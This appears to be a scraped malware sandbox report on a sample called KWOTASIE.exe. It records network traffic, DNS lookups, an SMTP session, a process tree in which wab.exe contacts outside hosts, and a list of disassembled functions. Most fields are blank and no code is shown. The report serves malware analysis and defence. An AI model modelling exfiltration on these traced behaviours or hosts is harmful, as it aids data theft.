Jul 2, 2024 08:14:32.601300955 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601345062 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601356983 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601376057 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601386070 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601387024 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601409912 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601438046 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601448059 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601453066 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601491928 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601583004 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601596117 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601608038 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601629019 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601656914 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601663113 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601674080 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601718903 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.601795912 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.601839066 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602044106 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602085114 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602088928 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602094889 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602118969 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602138996 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602236032 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602246046 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602256060 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602276087 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602298975 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602785110 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602830887 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602854013 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602864981 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602899075 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.602952957 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602969885 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.602994919 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.603018999 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.902353048 CEST | 49715 | 80 | 192.168.2.5 | 208.95.112.1 |
Jul 2, 2024 08:14:32.907263994 CEST | 80 | 49715 | 208.95.112.1 | 192.168.2.5 |
Jul 2, 2024 08:14:32.909786940 CEST | 49715 | 80 | 192.168.2.5 | 208.95.112.1 |
Jul 2, 2024 08:14:32.909986973 CEST | 49715 | 80 | 192.168.2.5 | 208.95.112.1 |
Jul 2, 2024 08:14:32.914808035 CEST | 80 | 49715 | 208.95.112.1 | 192.168.2.5 |
Jul 2, 2024 08:14:33.396244049 CEST | 80 | 49715 | 208.95.112.1 | 192.168.2.5 |
Jul 2, 2024 08:14:33.449534893 CEST | 49715 | 80 | 192.168.2.5 | 208.95.112.1 |
Jul 2, 2024 08:14:35.010227919 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:35.015044928 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:35.015127897 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:37.937992096 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:37.938404083 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:37.943156004 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.270381927 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.270672083 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:38.275465012 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.604161978 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.615191936 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:38.620119095 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.959702015 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.959722042 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.959733963 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:38.959907055 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:38.972735882 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:38.977812052 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:39.305402040 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:39.319648981 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:39.324476004 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:39.651352882 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:39.651740074 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:39.656501055 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:39.984518051 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:39.984877110 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:39.989651918 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:40.344221115 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:40.344532013 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:40.349334002 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:40.676584005 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:40.676980972 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:40.681747913 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.038839102 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.039184093 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:41.044496059 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.371649027 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.372375011 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:41.372452021 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:41.372514009 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:41.372514009 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:41.377396107 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.377408028 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.377417088 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.377425909 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.943964958 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 |
Jul 2, 2024 08:14:41.996453047 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 |
Jul 2, 2024 08:14:42.609888077 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:42.610004902 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:15:24.356408119 CEST | 49715 | 80 | 192.168.2.5 | 208.95.112.1 |
Jul 2, 2024 08:15:24.361812115 CEST | 80 | 49715 | 208.95.112.1 | 192.168.2.5 |
Jul 2, 2024 08:15:24.361880064 CEST | 49715 | 80 | 192.168.2.5 | 208.95.112.1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 2, 2024 08:14:30.676949024 CEST | 53492 | 53 | 192.168.2.5 | 1.1.1.1 |
Jul 2, 2024 08:14:30.684187889 CEST | 53 | 53492 | 1.1.1.1 | 192.168.2.5 |
Jul 2, 2024 08:14:32.889214993 CEST | 49875 | 53 | 192.168.2.5 | 1.1.1.1 |
Jul 2, 2024 08:14:32.898752928 CEST | 53 | 49875 | 1.1.1.1 | 192.168.2.5 |
Jul 2, 2024 08:14:34.350888968 CEST | 58411 | 53 | 192.168.2.5 | 1.1.1.1 |
Jul 2, 2024 08:14:35.009377003 CEST | 53 | 58411 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jul 2, 2024 08:14:30.676949024 CEST | 192.168.2.5 | 1.1.1.1 | 0x6b75 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 2, 2024 08:14:32.889214993 CEST | 192.168.2.5 | 1.1.1.1 | 0x837f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 2, 2024 08:14:34.350888968 CEST | 192.168.2.5 | 1.1.1.1 | 0x6752 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jul 2, 2024 08:14:30.684187889 CEST | 1.1.1.1 | 192.168.2.5 | 0x6b75 | No error (0) | 102.218.215.35 | A (IP address) | IN (0x0001) | false | ||
Jul 2, 2024 08:14:32.898752928 CEST | 1.1.1.1 | 192.168.2.5 | 0x837f | No error (0) | 208.95.112.1 | A (IP address) | IN (0x0001) | false | ||
Jul 2, 2024 08:14:35.009377003 CEST | 1.1.1.1 | 192.168.2.5 | 0x6752 | No error (0) | 102.130.125.173 | A (IP address) | IN (0x0001) | false | ||
Jul 2, 2024 08:14:57.280328989 CEST | 1.1.1.1 | 192.168.2.5 | 0x299d | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false | ||
Jul 2, 2024 08:14:57.280328989 CEST | 1.1.1.1 | 192.168.2.5 | 0x299d | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49714 | 102.218.215.35 | 80 | 5032 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 2, 2024 08:14:30.695817947 CEST | 166 | OUT | |
Jul 2, 2024 08:14:31.656052113 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656068087 CEST | 224 | IN | |
Jul 2, 2024 08:14:31.656081915 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656094074 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656105995 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656116962 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656126976 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656137943 CEST | 552 | IN | |
Jul 2, 2024 08:14:31.656147957 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656160116 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.661001921 CEST | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49715 | 208.95.112.1 | 80 | 5032 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 2, 2024 08:14:32.909986973 CEST | 80 | OUT | |
Jul 2, 2024 08:14:33.396244049 CEST | 175 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Jul 2, 2024 08:14:37.937992096 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 | 220-vps5.ncwsa.co.za ESMTP Exim 4.96.2 #2 Tue, 02 Jul 2024 08:14:37 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. |
Jul 2, 2024 08:14:37.938404083 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 | EHLO 887849 |
Jul 2, 2024 08:14:38.270381927 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 | 250-vps5.ncwsa.co.za Hello 887849 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP |
Jul 2, 2024 08:14:38.270672083 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 | STARTTLS |
Jul 2, 2024 08:14:38.604161978 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 | 220 TLS go ahead |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:13:35 |
Start date: | 02/07/2024 |
Path: | C:\Users\user\Desktop\KWOTASIE.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 982'616 bytes |
MD5 hash: | ECBEC21DCFA39A1131D2A79ACDF73F88 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:13:36 |
Start date: | 02/07/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x300000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:13:36 |
Start date: | 02/07/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 02:14:21 |
Start date: | 02/07/2024 |
Path: | C:\Program Files (x86)\Windows Mail\wab.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcc0000 |
File size: | 516'608 bytes |
MD5 hash: | 251E51E2FEDCE8BB82763D39D631EF89 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 23.9% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.8% |
Total number of Nodes: | 1348 |
Total number of Limit Nodes: | 36 |
Graph
Function 0040333D Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 412stringfilecomCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004053EF Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D08 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405912 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004046B0 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040437E Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
